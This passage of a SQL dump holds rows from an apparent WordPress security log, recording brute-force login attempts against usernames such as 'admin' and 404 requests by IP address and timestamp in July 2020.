06:59:58','154.160.14.204',NULL,NULL),(68944,'brute_force','2020-07-20 01:59:58','2020-07-20 06:59:58',NULL,NULL,'admin'),(68945,'brute_force','2020-07-20 02:01:05','2020-07-20 07:01:05','154.160.14.204',NULL,NULL),(68946,'brute_force','2020-07-20 02:01:05','2020-07-20 07:01:05',NULL,NULL,'admin'),(68947,'brute_force','2020-07-20 02:02:03','2020-07-20 07:02:03','154.160.14.204',NULL,NULL),(68948,'brute_force','2020-07-20 02:02:03','2020-07-20 07:02:03',NULL,NULL,'admin'),(68949,'brute_force','2020-07-20 02:03:04','2020-07-20 07:03:04','154.160.14.204',NULL,NULL),(68950,'brute_force','2020-07-20 02:03:04','2020-07-20 07:03:04',NULL,NULL,'admin'),(68951,'brute_force','2020-07-20 02:04:06','2020-07-20 07:04:06','154.160.14.204',NULL,NULL),(68952,'brute_force','2020-07-20 02:04:06','2020-07-20 07:04:06',NULL,NULL,'admin'),(68953,'four_oh_four','2020-07-20 02:56:37','2020-07-20 07:56:37','46.4.83.150',NULL,NULL),(68954,'four_oh_four','2020-07-20 02:56:51','2020-07-20 07:56:51','88.198.90.9',NULL,NULL),(68955,'four_oh_four','2020-07-20 02:57:07','2020-07-20 07:57:07','46.4.83.150',NULL,NULL),(68956,'four_oh_four','2020-07-20 08:09:48','2020-07-20 13:09:48','157.55.39.9',NULL,NULL),(68957,'four_oh_four','2020-07-20 08:30:27','2020-07-20 13:30:27','157.55.39.9',NULL,NULL),(68958,'four_oh_four','2020-07-20 10:31:49','2020-07-20 15:31:49','207.46.13.31',NULL,NULL),(68959,'four_oh_four','2020-07-20 14:03:05','2020-07-20 19:03:05','184.154.139.21',NULL,NULL),(68960,'four_oh_four','2020-07-20 15:33:20','2020-07-20 20:33:20','52.201.182.91',NULL,NULL),(68961,'four_oh_four','2020-07-20 15:33:21','2020-07-20 20:33:21','52.201.182.91',NULL,NULL),(68962,'four_oh_four','2020-07-20 16:17:20','2020-07-20 21:17:20','89.46.105.176',NULL,NULL),(68963,'brute_force','2020-07-21 00:32:52','2020-07-21 05:32:52','50.63.92.162',NULL,NULL),(68964,'brute_force','2020-07-21 00:32:52','2020-07-21 05:32:52',NULL,NULL,'admin'),(68965,'four_oh_four','2020-07-21 02:20:57','2020-07-21 07:20:57','40.77.167.76',NULL,NULL),(68966,'four_oh_four','2020-07-21 04:44:26','2020-07-21 09:44:26','157.55.39.65',NULL,NULL),(68967,'four_oh_four','2020-07-21 06:07:31','2020-07-21 11:07:31','40.77.167.76',NULL,NULL),(68968,'four_oh_four','2020-07-21 08:00:10','2020-07-21 13:00:10','162.241.218.202',NULL,NULL),(68969,'four_oh_four','2020-07-21 09:55:31','2020-07-21 14:55:31','40.77.167.76',NULL,NULL),(68970,'four_oh_four','2020-07-21 11:24:52','2020-07-21 16:24:52','40.77.167.75',NULL,NULL),(68971,'four_oh_four','2020-07-21 14:02:16','2020-07-21 19:02:16','184.154.139.21',NULL,NULL),(68972,'four_oh_four','2020-07-21 15:35:43','2020-07-21 20:35:43','52.201.182.91',NULL,NULL),(68973,'four_oh_four','2020-07-21 15:35:46','2020-07-21 20:35:46','52.201.182.91',NULL,NULL),(68974,'four_oh_four','2020-07-21 15:35:49','2020-07-21 20:35:49','52.201.182.91',NULL,NULL),(68975,'four_oh_four','2020-07-21 15:35:51','2020-07-21 20:35:51','52.201.182.91',NULL,NULL),(68976,'four_oh_four','2020-07-21 18:34:58','2020-07-21 23:34:58','40.77.167.75',NULL,NULL),(68977,'four_oh_four','2020-07-21 23:14:49','2020-07-22 04:14:49','193.106.30.99',NULL,NULL),(68978,'four_oh_four','2020-07-21 23:49:42','2020-07-22 04:49:42','66.249.65.158',NULL,NULL),(68979,'four_oh_four','2020-07-22 02:22:27','2020-07-22 07:22:27','162.243.126.96',NULL,NULL),(68980,'four_oh_four','2020-07-22 03:52:31','2020-07-22 08:52:31','85.214.62.28',NULL,NULL),(68981,'four_oh_four','2020-07-22 05:34:25','2020-07-22 10:34:25','207.46.13.182',NULL,NULL),(68982,'four_oh_four','2020-07-22 08:10:15','2020-07-22 13:10:15','40.77.167.129',NULL,NULL),(68983,'four_oh_four','2020-07-22 09:44:24','2020-07-22 14:44:24','40.77.167.129',NULL,NULL),(68984,'four_oh_four','2020-07-22 10:32:24','2020-07-22 15:32:24','66.249.65.140',NULL,NULL),(68985,'four_oh_four','2020-07-22 12:40:44','2020-07-22 17:40:44','88.99.161.235',NULL,NULL),(68986,'four_oh_four','2020-07-22 12:40:47','2020-07-22 17:40:47','88.99.161.235',NULL,NULL),(68987,'four_oh_four','2020-07-22 12:40:49','2020-07-22 17:40:49','88.99.161.235',NULL,NULL),(68988,'four_oh_four','2020-07-22 13:16:04','2020-07-22 18:16:04','40.77.167.37',NULL,NULL),(68989,'four_oh_four','2020-07-22 14:04:00','2020-07-22 19:04:00','193.106.30.99',NULL,NULL),(68990,'four_oh_four','2020-07-22 14:07:14','2020-07-22 19:07:14','184.154.139.18',NULL,NULL),(68991,'four_oh_four','2020-07-22 15:41:37','2020-07-22 20:41:37','52.201.182.91',NULL,NULL),(68992,'four_oh_four','2020-07-22 15:41:42','2020-07-22 20:41:42','52.201.182.91',NULL,NULL),(68993,'four_oh_four','2020-07-22 15:41:42','2020-07-22 20:41:42','3.94.137.21',NULL,NULL),(68994,'four_oh_four','2020-07-22 15:41:44','2020-07-22 20:41:44','3.94.137.21',NULL,NULL),(68995,'four_oh_four','2020-07-22 22:06:59','2020-07-23 03:06:59','66.249.65.144',NULL,NULL),(68996,'four_oh_four','2020-07-23 00:14:40','2020-07-23 05:14:40','157.55.39.231',NULL,NULL),(68997,'four_oh_four','2020-07-23 00:20:26','2020-07-23 05:20:26','207.46.13.182',NULL,NULL),(68998,'four_oh_four','2020-07-23 00:27:01','2020-07-23 05:27:01','198.57.247.129',NULL,NULL),(68999,'four_oh_four','2020-07-23 03:31:25','2020-07-23 08:31:25','121.42.142.188',NULL,NULL),(69000,'four_oh_four','2020-07-23 03:35:39','2020-07-23 08:35:39','121.42.142.188',NULL,NULL),(69001,'four_oh_four','2020-07-23 06:10:28','2020-07-23 11:10:28','40.77.167.186',NULL,NULL),(69002,'brute_force','2020-07-23 07:53:18','2020-07-23 12:53:18','112.135.6.230',NULL,NULL),(69003,'brute_force','2020-07-23 07:53:18','2020-07-23 12:53:18',NULL,NULL,'zphiblgz'),(69004,'brute_force','2020-07-23 07:54:18','2020-07-23 12:54:18','112.135.6.230',NULL,NULL),(69005,'brute_force','2020-07-23 07:54:18','2020-07-23 12:54:18',NULL,NULL,'zphiblgz'),(69006,'brute_force','2020-07-23 07:55:19','2020-07-23 12:55:19','112.135.6.230',NULL,NULL),(69007,'brute_force','2020-07-23 07:55:19','2020-07-23 12:55:19',NULL,NULL,'zphiblgz'),(69008,'brute_force','2020-07-23 07:56:20','2020-07-23 12:56:20','112.135.6.230',NULL,NULL),(69009,'brute_force','2020-07-23 07:56:20','2020-07-23 12:56:20',NULL,NULL,'zphiblgz'),(69010,'brute_force','2020-07-23 07:57:21','2020-07-23 12:57:21','112.135.6.230',NULL,NULL),(69011,'brute_force','2020-07-23 07:57:21','2020-07-23 12:57:21',NULL,NULL,'zphiblgz'),(69012,'brute_force','2020-07-23 08:12:36','2020-07-23 13:12:36','112.135.6.230',NULL,NULL),(69013,'brute_force','2020-07-23 08:12:36','2020-07-23 13:12:36',NULL,NULL,'zphiblgz'),(69014,'brute_force','2020-07-23 08:27:51','2020-07-23 13:27:51','112.135.6.230',NULL,NULL),(69015,'brute_force','2020-07-23 08:27:51','2020-07-23 13:27:51',NULL,NULL,'zphiblgz'),(69016,'brute_force','2020-07-23 08:28:53','2020-07-23 13:28:53','112.135.6.230',NULL,NULL),(69017,'brute_force','2020-07-23 08:28:53','2020-07-23 13:28:53',NULL,NULL,'zphiblgz'),(69018,'brute_force','2020-07-23 08:29:53','2020-07-23 13:29:53','112.135.6.230',NULL,NULL),(69019,'brute_force','2020-07-23 08:29:53','2020-07-23 13:29:53',NULL,NULL,'zphiblgz'),(69020,'brute_force','2020-07-23 08:30:54','2020-07-23 13:30:54','112.135.6.230',NULL,NULL),(69021,'brute_force','2020-07-23 08:30:54','2020-07-23 13:30:54',NULL,NULL,'zphiblgz'),(69022,'brute_force','2020-07-23 08:31:55','2020-07-23 13:31:55','112.135.6.230',NULL,NULL),(69023,'brute_force','2020-07-23 08:31:55','2020-07-23 13:31:55',NULL,NULL,'zphiblgz'),(69024,'brute_force','2020-07-23 08:47:10','2020-07-23 13:47:10','112.135.6.230',NULL,NULL),(69025,'brute_force','2020-07-23 08:47:10','2020-07-23 13:47:10',NULL,NULL,'zphiblgz'),(69026,'brute_force','2020-07-23 09:02:27','2020-07-23 14:02:27','112.135.6.230',NULL,NULL),(69027,'brute_force','2020-07-23 09:02:27','2020-07-23 14:02:27',NULL,NULL,'zphiblgz'),(69028,'brute_force','2020-07-23 09:03:27','2020-07-23 14:03:27','112.135.6.230',NULL,NULL),(69029,'brute_force','2020-07-23 09:03:27','2020-07-23 14:03:27',NULL,NULL,'zphiblgz'),(69030,'brute_force','2020-07-23 09:04:28','2020-07-23 14:04:28','112.135.6.230',NULL,NULL),(69031,'brute_force','2020-07-23 09:04:28','2020-07-23 14:04:28',NULL,NULL,'zphiblgz'),(69032,'brute_force','2020-07-23 09:05:28','2020-07-23 14:05:28','112.135.6.230',NULL,NULL),(69033,'brute_force','2020-07-23 09:05:28','2020-07-23 14:05:28',NULL,NULL,'zphiblgz'),(69034,'brute_force','2020-07-23 09:06:29','2020-07-23 14:06:29','112.135.6.230',NULL,NULL),(69035,'brute_force','2020-07-23 09:06:29','2020-07-23 14:06:29',NULL,NULL,'zphiblgz'),(69036,'four_oh_four','2020-07-23 14:03:52','2020-07-23 19:03:52','184.154.139.17',NULL,NULL),(69037,'four_oh_four','2020-07-23 14:46:04','2020-07-23 19:46:04','173.254.30.34',NULL,NULL),(69038,'four_oh_four','2020-07-23 16:28:58','2020-07-23 21:28:58','3.94.137.21',NULL,NULL),(69039,'four_oh_four','2020-07-23 16:29:00','2020-07-23 21:29:00','3.94.137.21',NULL,NULL),(69040,'four_oh_four','2020-07-23 16:47:58','2020-07-23 21:47:58','157.55.39.231',NULL,NULL),(69041,'four_oh_four','2020-07-23 19:58:58','2020-07-24 00:58:58','193.106.30.99',NULL,NULL),(69042,'brute_force','2020-07-23 20:40:24','2020-07-24 01:40:24','50.63.196.68',NULL,NULL),(69043,'brute_force','2020-07-23 20:40:24','2020-07-24 01:40:24',NULL,NULL,'admin'),(69044,'four_oh_four','2020-07-23 20:45:02','2020-07-24 01:45:02','193.106.30.99',NULL,NULL),(69045,'four_oh_four','2020-07-23 22:56:57','2020-07-24 03:56:57','52.188.122.39',NULL,NULL),(69046,'four_oh_four','2020-07-23 22:57:20','2020-07-24 03:57:20','52.188.122.39',NULL,NULL),(69047,'four_oh_four','2020-07-23 22:57:31','2020-07-24 03:57:31','52.188.122.39',NULL,NULL),(69048,'four_oh_four','2020-07-23 22:58:04','2020-07-24 03:58:04','52.188.122.39',NULL,NULL),(69049,'four_oh_four','2020-07-23 22:59:03','2020-07-24 03:59:03','52.188.122.39',NULL,NULL),(69050,'four_oh_four','2020-07-23 22:59:13','2020-07-24 03:59:13','52.188.122.39',NULL,NULL),(69051,'four_oh_four','2020-07-23 22:59:23','2020-07-24 03:59:23','52.188.122.39',NULL,NULL),(69052,'four_oh_four','2020-07-23 22:59:40','2020-07-24 03:59:40','52.188.122.39',NULL,NULL),(69053,'four_oh_four','2020-07-23 23:00:11','2020-07-24 04:00:11','52.188.122.39',NULL,NULL),(69054,'four_oh_four','2020-07-23 23:00:38','2020-07-24 04:00:38','52.188.122.39',NULL,NULL),(69055,'four_oh_four','2020-07-23 23:01:14','2020-07-24 04:01:14','52.188.122.39',NULL,NULL),(69056,'four_oh_four','2020-07-23 23:01:30','2020-07-24 04:01:30','52.188.122.39',NULL,NULL),(69057,'four_oh_four','2020-07-23 23:01:57','2020-07-24 04:01:57','52.188.122.39',NULL,NULL),(69058,'four_oh_four','2020-07-23 23:02:18','2020-07-24 04:02:18','52.188.122.39',NULL,NULL),(69059,'four_oh_four','2020-07-23 23:02:40','2020-07-24 04:02:40','52.188.122.39',NULL,NULL),(69060,'four_oh_four','2020-07-23 23:03:00','2020-07-24 04:03:00','52.188.122.39',NULL,NULL),(69061,'four_oh_four','2020-07-23 23:13:44','2020-07-24 04:13:44','193.106.30.99',NULL,NULL),(69062,'four_oh_four','2020-07-24 00:32:23','2020-07-24 05:32:23','114.119.167.159',NULL,NULL),(69063,'four_oh_four','2020-07-24 01:18:11','2020-07-24 06:18:11','40.77.167.37',NULL,NULL),(69064,'four_oh_four','2020-07-24 01:48:42','2020-07-24 06:48:42','157.55.39.231',NULL,NULL),(69065,'four_oh_four','2020-07-24 03:01:48','2020-07-24 08:01:48','114.119.164.137',NULL,NULL),(69066,'four_oh_four','2020-07-24 04:00:37','2020-07-24 09:00:37','40.77.167.37',NULL,NULL),(69067,'four_oh_four','2020-07-24 04:35:53','2020-07-24 09:35:53','207.46.13.182',NULL,NULL),(69068,'four_oh_four','2020-07-24 05:29:52','2020-07-24 10:29:52','193.106.30.99',NULL,NULL),(69069,'four_oh_four','2020-07-24 05:47:42','2020-07-24 10:47:42','193.106.30.99',NULL,NULL),(69070,'four_oh_four','2020-07-24 07:04:54','2020-07-24 12:04:54','193.106.30.99',NULL,NULL),(69071,'four_oh_four','2020-07-24 08:10:39','2020-07-24 13:10:39','40.77.167.208',NULL,NULL),(69072,'four_oh_four','2020-07-24 09:35:11','2020-07-24 14:35:11','114.119.162.150',NULL,NULL),(69073,'four_oh_four','2020-07-24 10:00:40','2020-07-24 15:00:40','157.55.39.231',NULL,NULL),(69074,'four_oh_four','2020-07-24 12:34:40','2020-07-24 17:34:40','114.119.162.150',NULL,NULL),(69075,'four_oh_four','2020-07-24 14:09:14','2020-07-24 19:09:14','184.154.139.18',NULL,NULL),(69076,'four_oh_four','2020-07-24 16:34:05','2020-07-24 21:34:05','52.201.182.91',NULL,NULL),(69077,'four_oh_four','2020-07-24 16:34:06','2020-07-24 21:34:06','52.201.182.91',NULL,NULL),(69078,'four_oh_four','2020-07-24 16:34:08','2020-07-24 21:34:08','52.201.182.91',NULL,NULL),(69079,'four_oh_four','2020-07-24 16:34:09','2020-07-24 21:34:09','52.201.182.91',NULL,NULL),(69080,'four_oh_four','2020-07-24 17:52:40','2020-07-24 22:52:40','137.74.193.70',NULL,NULL),(69081,'four_oh_four','2020-07-24 17:52:47','2020-07-24 22:52:47','137.74.193.70',NULL,NULL),(69082,'four_oh_four','2020-07-24 17:56:04','2020-07-24 22:56:04','50.87.144.45',NULL,NULL),(69083,'four_oh_four','2020-07-24 18:07:30','2020-07-24 23:07:30','114.119.162.150',NULL,NULL),(69084,'four_oh_four','2020-07-24 18:23:03','2020-07-24 23:23:03','157.55.39.237',NULL,NULL),(69085,'four_oh_four','2020-07-24 18:53:31','2020-07-24 23:53:31','40.77.167.37',NULL,NULL),(69086,'four_oh_four','2020-07-24 22:58:41','2020-07-25 03:58:41','37.1.204.92',NULL,NULL),(69087,'four_oh_four','2020-07-25 01:46:15','2020-07-25 06:46:15','114.119.167.159',NULL,NULL),(69088,'four_oh_four','2020-07-25 02:24:02','2020-07-25 07:24:02','40.77.167.37',NULL,NULL),(69089,'four_oh_four','2020-07-25 04:53:16','2020-07-25 09:53:16','193.106.30.99',NULL,NULL),(69090,'four_oh_four','2020-07-25 05:50:33','2020-07-25 10:50:33','114.119.167.73',NULL,NULL),(69091,'brute_force','2020-07-25 06:09:15','2020-07-25 11:09:15','213.251.157.152',NULL,NULL),(69092,'brute_force','2020-07-25 06:09:15','2020-07-25 11:09:15',NULL,NULL,'admin'),(69093,'four_oh_four','2020-07-25 07:26:10','2020-07-25 12:26:10','193.106.30.99',NULL,NULL),(69094,'four_oh_four','2020-07-25 08:33:05','2020-07-25 13:33:05','114.119.162.150',NULL,NULL),(69095,'four_oh_four','2020-07-25 08:48:37','2020-07-25 13:48:37','157.55.39.234',NULL,NULL),(69096,'four_oh_four','2020-07-25 09:57:16','2020-07-25 14:57:16','207.46.13.187',NULL,NULL),(69097,'four_oh_four','2020-07-25 09:59:50','2020-07-25 14:59:50','114.119.167.159',NULL,NULL),(69098,'four_oh_four','2020-07-25 12:37:54','2020-07-25 17:37:54','52.152.222.28',NULL,NULL),(69099,'four_oh_four','2020-07-25 12:37:55','2020-07-25 17:37:55','52.152.222.28',NULL,NULL),(69100,'four_oh_four','2020-07-25 12:38:00','2020-07-25 17:38:00','52.152.222.28',NULL,NULL),(69101,'four_oh_four','2020-07-25 12:38:01','2020-07-25 17:38:01','52.152.222.28',NULL,NULL),(69102,'four_oh_four','2020-07-25 12:38:25','2020-07-25 17:38:25','52.152.222.28',NULL,NULL),(69103,'four_oh_four','2020-07-25 12:38:33','2020-07-25 17:38:33','52.152.222.28',NULL,NULL),(69104,'four_oh_four','2020-07-25 12:49:11','2020-07-25 17:49:11','193.106.30.99',NULL,NULL),(69105,'four_oh_four','2020-07-25 14:05:05','2020-07-25 19:05:05','184.154.139.17',NULL,NULL),(69106,'four_oh_four','2020-07-25 15:09:38','2020-07-25 20:09:38','193.106.30.99',NULL,NULL),(69107,'four_oh_four','2020-07-25 15:45:47','2020-07-25 20:45:47','192.3.198.222',NULL,NULL),(69108,'four_oh_four','2020-07-25 16:38:52','2020-07-25 21:38:52','3.94.137.21',NULL,NULL),(69109,'four_oh_four','2020-07-25 16:38:56','2020-07-25 21:38:56','3.94.137.21',NULL,NULL),(69110,'four_oh_four','2020-07-25 16:38:58','2020-07-25 21:38:58','52.201.182.91',NULL,NULL),(69111,'four_oh_four','2020-07-25 16:38:59','2020-07-25 21:38:59','52.201.182.91',NULL,NULL),(69112,'four_oh_four','2020-07-25 22:00:55','2020-07-26 03:00:55','193.106.30.99',NULL,NULL),(69113,'four_oh_four','2020-07-26 00:16:10','2020-07-26 05:16:10','114.119.167.73',NULL,NULL),(69114,'four_oh_four','2020-07-26 00:22:22','2020-07-26 05:22:22','114.119.167.159',NULL,NULL),(69115,'four_oh_four','2020-07-26 00:28:06','2020-07-26 05:28:06','193.106.30.99',NULL,NULL),(69116,'four_oh_four','2020-07-26 02:22:22','2020-07-26 07:22:22','114.119.162.150',NULL,NULL),(69117,'four_oh_four','2020-07-26 02:41:01','2020-07-26 07:41:01','193.106.30.99',NULL,NULL),(69118,'four_oh_four','2020-07-26 04:53:26','2020-07-26 09:53:26','193.106.30.99',NULL,NULL),(69119,'four_oh_four','2020-07-26 06:09:48','2020-07-26 11:09:48','157.55.39.201',NULL,NULL),(69120,'four_oh_four','2020-07-26 06:25:51','2020-07-26 11:25:51','193.106.30.99',NULL,NULL),(69121,'four_oh_four','2020-07-26 07:26:02','2020-07-26 12:26:02','114.119.163.5',NULL,NULL),(69122,'four_oh_four','2020-07-26 08:24:09','2020-07-26 13:24:09','207.46.13.107',NULL,NULL),(69123,'four_oh_four','2020-07-26 08:26:52','2020-07-26 13:26:52','193.106.30.99',NULL,NULL),(69124,'four_oh_four','2020-07-26 08:54:07','2020-07-26 13:54:07','193.106.30.99',NULL,NULL),(69125,'four_oh_four','2020-07-26 10:49:08','2020-07-26 15:49:08','193.106.30.99',NULL,NULL),(69126,'brute_force','2020-07-26 12:42:56','2020-07-26 17:42:56','68.134.121.122',NULL,NULL),(69127,'brute_force','2020-07-26 12:42:56','2020-07-26 17:42:56',NULL,NULL,'linda'),(69128,'brute_force','2020-07-26 12:44:26','2020-07-26 17:44:26','68.134.121.122',NULL,NULL),(69129,'brute_force','2020-07-26 12:44:26','2020-07-26 17:44:26',NULL,NULL,'linda'),(69130,'four_oh_four','2020-07-26 13:57:59','2020-07-26 18:57:59','193.106.30.99',NULL,NULL),(69131,'four_oh_four','2020-07-26 14:05:43','2020-07-26 19:05:43','184.154.139.20',NULL,NULL),(69132,'four_oh_four','2020-07-26 14:10:26','2020-07-26 19:10:26','114.119.162.252',NULL,NULL),(69133,'four_oh_four','2020-07-26 14:29:28','2020-07-26 19:29:28','193.106.30.99',NULL,NULL),(69134,'four_oh_four','2020-07-26 14:56:40','2020-07-26 19:56:40','193.106.30.99',NULL,NULL),(69135,'four_oh_four','2020-07-26 15:07:40','2020-07-26 20:07:40','193.106.30.99',NULL,NULL),(69136,'four_oh_four','2020-07-26 15:55:23','2020-07-26 20:55:23','193.106.30.99',NULL,NULL),(69137,'four_oh_four','2020-07-26 16:39:47','2020-07-26 21:39:47','193.106.30.99',NULL,NULL),(69138,'four_oh_four','2020-07-26 16:43:51','2020-07-26 21:43:51','3.94.137.21',NULL,NULL),(69139,'four_oh_four','2020-07-26 16:43:55','2020-07-26 21:43:55','3.94.137.21',NULL,NULL),(69140,'four_oh_four','2020-07-26 16:43:58','2020-07-26 21:43:58','52.201.182.91',NULL,NULL),(69141,'four_oh_four','2020-07-26 16:44:00','2020-07-26 21:44:00','52.201.182.91',NULL,NULL),(69142,'four_oh_four','2020-07-26 20:18:21','2020-07-27 01:18:21','193.106.30.99',NULL,NULL),(69143,'four_oh_four','2020-07-26 20:38:16','2020-07-27 01:38:16','207.46.13.107',NULL,NULL),(69144,'four_oh_four','2020-07-26 21:34:27','2020-07-27 02:34:27','193.106.30.99',NULL,NULL),(69145,'four_oh_four','2020-07-26 21:38:35','2020-07-27 02:38:35','193.106.30.99',NULL,NULL),(69146,'four_oh_four','2020-07-26 22:05:51','2020-07-27 03:05:51','193.106.30.99',NULL,NULL),(69147,'four_oh_four','2020-07-26 22:11:08','2020-07-27 03:11:08','193.106.30.99',NULL,NULL),(69148,'four_oh_four','2020-07-26 22:26:10','2020-07-27 03:26:10','193.106.30.99',NULL,NULL),(69149,'four_oh_four','2020-07-26 22:50:49','2020-07-27 03:50:49','193.106.30.99',NULL,NULL),(69150,'four_oh_four','2020-07-27 00:01:30','2020-07-27 05:01:30','193.106.30.99',NULL,NULL),(69151,'four_oh_four','2020-07-27 00:04:34','2020-07-27 05:04:34','212.102.33.222',NULL,NULL),(69152,'four_oh_four','2020-07-27 00:04:36','2020-07-27 05:04:36','212.102.33.222',NULL,NULL),(69153,'four_oh_four','2020-07-27 00:04:48','2020-07-27 05:04:48','212.102.33.222',NULL,NULL),(69154,'four_oh_four','2020-07-27 00:04:50','2020-07-27 05:04:50','212.102.33.222',NULL,NULL),(69155,'four_oh_four','2020-07-27 00:05:27','2020-07-27 05:05:27','212.102.33.222',NULL,NULL),(69156,'four_oh_four','2020-07-27 00:05:39','2020-07-27 05:05:39','212.102.33.222',NULL,NULL),(69157,'four_oh_four','2020-07-27 00:14:04','2020-07-27 05:14:04','162.243.29.24',NULL,NULL),(69158,'four_oh_four','2020-07-27 00:39:47','2020-07-27 05:39:47','193.106.30.99',NULL,NULL),(69159,'four_oh_four','2020-07-27 00:47:54','2020-07-27 05:47:54','114.119.163.5',NULL,NULL),(69160,'four_oh_four','2020-07-27 01:19:03','2020-07-27 06:19:03','35.188.116.244',NULL,NULL),(69161,'four_oh_four','2020-07-27 01:19:14','2020-07-27 06:19:14','35.188.116.244',NULL,NULL),(69162,'four_oh_four','2020-07-27 01:53:36','2020-07-27 06:53:36','193.106.30.99',NULL,NULL),(69163,'four_oh_four','2020-07-27 01:59:59','2020-07-27 06:59:59','114.119.167.73',NULL,NULL),(69164,'four_oh_four','2020-07-27 02:02:42','2020-07-27 07:02:42','193.106.30.99',NULL,NULL),(69165,'four_oh_four','2020-07-27 02:14:38','2020-07-27 07:14:38','193.106.30.99',NULL,NULL),(69166,'four_oh_four','2020-07-27 04:15:12','2020-07-27 09:15:12','193.106.30.99',NULL,NULL),(69167,'four_oh_four','2020-07-27 04:16:17','2020-07-27 09:16:17','193.106.30.99',NULL,NULL),(69168,'four_oh_four','2020-07-27 04:51:27','2020-07-27 09:51:27','207.46.13.55',NULL,NULL),(69169,'four_oh_four','2020-07-27 05:20:45','2020-07-27 10:20:45','193.106.30.99',NULL,NULL),(69170,'four_oh_four','2020-07-27 05:23:40','2020-07-27 10:23:40','193.106.30.99',NULL,NULL),(69171,'four_oh_four','2020-07-27 05:32:02','2020-07-27 10:32:02','207.46.13.107',NULL,NULL),(69172,'four_oh_four','2020-07-27 06:20:18','2020-07-27 11:20:18','114.119.162.92',NULL,NULL),(69173,'four_oh_four','2020-07-27 06:58:11','2020-07-27 11:58:11','207.46.13.55',NULL,NULL),(69174,'four_oh_four','2020-07-27 07:29:32','2020-07-27 12:29:32','144.76.102.243',NULL,NULL),(69175,'four_oh_four','2020-07-27 07:29:54','2020-07-27 12:29:54','78.46.94.83',NULL,NULL),(69176,'four_oh_four','2020-07-27 08:12:10','2020-07-27 13:12:10','193.106.30.99',NULL,NULL),(69177,'four_oh_four','2020-07-27 08:21:01','2020-07-27 13:21:01','193.106.30.99',NULL,NULL),(69178,'four_oh_four','2020-07-27 08:52:42','2020-07-27 13:52:42','193.106.30.99',NULL,NULL),(69179,'four_oh_four','2020-07-27 09:11:23','2020-07-27 14:11:23','193.106.30.99',NULL,NULL),(69180,'four_oh_four','2020-07-27 09:43:59','2020-07-27 14:43:59','193.106.30.99',NULL,NULL),(69181,'four_oh_four','2020-07-27 10:08:55','2020-07-27 15:08:55','193.106.30.99',NULL,NULL),(69182,'four_oh_four','2020-07-27 10:12:13','2020-07-27 15:12:13','193.106.30.99',NULL,NULL),(69183,'four_oh_four','2020-07-27 11:23:40','2020-07-27 16:23:40','193.106.30.99',NULL,NULL),(69184,'four_oh_four','2020-07-27 11:53:35','2020-07-27 16:53:35','193.106.30.99',NULL,NULL),(69185,'brute_force','2020-07-27 12:04:51','2020-07-27 17:04:51','65.181.124.56',NULL,NULL),(69186,'brute_force','2020-07-27 12:04:51','2020-07-27 17:04:51',NULL,NULL,'admin'),(69187,'four_oh_four','2020-07-27 12:12:52','2020-07-27 17:12:52','193.106.30.99',NULL,NULL),(69188,'four_oh_four','2020-07-27 12:49:44','2020-07-27 17:49:44','193.106.30.99',NULL,NULL),(69189,'four_oh_four','2020-07-27 13:13:06','2020-07-27 18:13:06','193.106.30.99',NULL,NULL),(69190,'four_oh_four','2020-07-27 14:00:40','2020-07-27 19:00:40','157.55.39.96',NULL,NULL),(69191,'four_oh_four','2020-07-27 14:02:49','2020-07-27 19:02:49','184.154.139.17',NULL,NULL),(69192,'four_oh_four','2020-07-27 14:06:21','2020-07-27 19:06:21','193.106.30.99',NULL,NULL),(69193,'four_oh_four','2020-07-27 15:24:30','2020-07-27 20:24:30','193.106.30.99',NULL,NULL),(69194,'four_oh_four','2020-07-27 16:02:25','2020-07-27 21:02:25','193.106.30.99',NULL,NULL),(69195,'four_oh_four','2020-07-27 16:07:25','2020-07-27 21:07:25','157.55.39.84',NULL,NULL),(69196,'four_oh_four','2020-07-27 16:49:16','2020-07-27 21:49:16','3.94.137.21',NULL,NULL),(69197,'four_oh_four','2020-07-27 16:49:19','2020-07-27 21:49:19','3.94.137.21',NULL,NULL),(69198,'four_oh_four','2020-07-27 16:49:22','2020-07-27 21:49:22','3.94.137.21',NULL,NULL),(69199,'four_oh_four','2020-07-27 16:49:24','2020-07-27 21:49:24','3.94.137.21',NULL,NULL),(69200,'four_oh_four','2020-07-27 16:58:21','2020-07-27 21:58:21','193.106.30.99',NULL,NULL),(69201,'four_oh_four','2020-07-27 17:34:00','2020-07-27 22:34:00','193.106.30.99',NULL,NULL),(69202,'four_oh_four','2020-07-27 17:50:32','2020-07-27 22:50:32','193.106.30.99',NULL,NULL),(69203,'four_oh_four','2020-07-27 18:07:21','2020-07-27 23:07:21','193.106.30.99',NULL,NULL),(69204,'four_oh_four','2020-07-27 18:08:41','2020-07-27 23:08:41','193.106.30.99',NULL,NULL),(69205,'four_oh_four','2020-07-27 18:19:42','2020-07-27 23:19:42','114.119.163.5',NULL,NULL),(69206,'four_oh_four','2020-07-27 18:37:37','2020-07-27 23:37:37','193.106.30.99',NULL,NULL),(69207,'four_oh_four','2020-07-27 19:04:34','2020-07-28 00:04:34','5.188.84.76',NULL,NULL),(69208,'four_oh_four','2020-07-27 19:13:01','2020-07-28 00:13:01','193.106.30.99',NULL,NULL),(69209,'four_oh_four','2020-07-27 19:59:41','2020-07-28 00:59:41','193.106.30.99',NULL,NULL),(69210,'four_oh_four','2020-07-27 21:14:19','2020-07-28 02:14:19','193.106.30.99',NULL,NULL),(69211,'four_oh_four','2020-07-27 21:14:56','2020-07-28 02:14:56','114.119.162.92',NULL,NULL),(69212,'four_oh_four','2020-07-27 21:38:22','2020-07-28 02:38:22','66.249.65.158',NULL,NULL),(69213,'four_oh_four','2020-07-27 21:58:32','2020-07-28 02:58:32','193.106.30.99',NULL,NULL),(69214,'four_oh_four','2020-07-27 23:46:09','2020-07-28 04:46:09','193.106.30.99',NULL,NULL),(69215,'four_oh_four','2020-07-28 00:30:19','2020-07-28 05:30:19','193.106.30.99',NULL,NULL),(69216,'four_oh_four','2020-07-28 01:55:16','2020-07-28 06:55:16','193.106.30.99',NULL,NULL),(69217,'four_oh_four','2020-07-28 01:56:25','2020-07-28 06:56:25','193.106.30.99',NULL,NULL),(69218,'four_oh_four','2020-07-28 02:11:15','2020-07-28 07:11:15','193.106.30.99',NULL,NULL),(69219,'four_oh_four','2020-07-28 03:25:49','2020-07-28 08:25:49','193.106.30.99',NULL,NULL),(69220,'four_oh_four','2020-07-28 04:05:00','2020-07-28 09:05:00','157.55.39.52',NULL,NULL),(69221,'four_oh_four','2020-07-28 04:08:46','2020-07-28 09:08:46','193.106.30.99',NULL,NULL),(69222,'four_oh_four','2020-07-28 05:02:21','2020-07-28 10:02:21','114.119.162.150',NULL,NULL),(69223,'four_oh_four','2020-07-28 05:14:48','2020-07-28 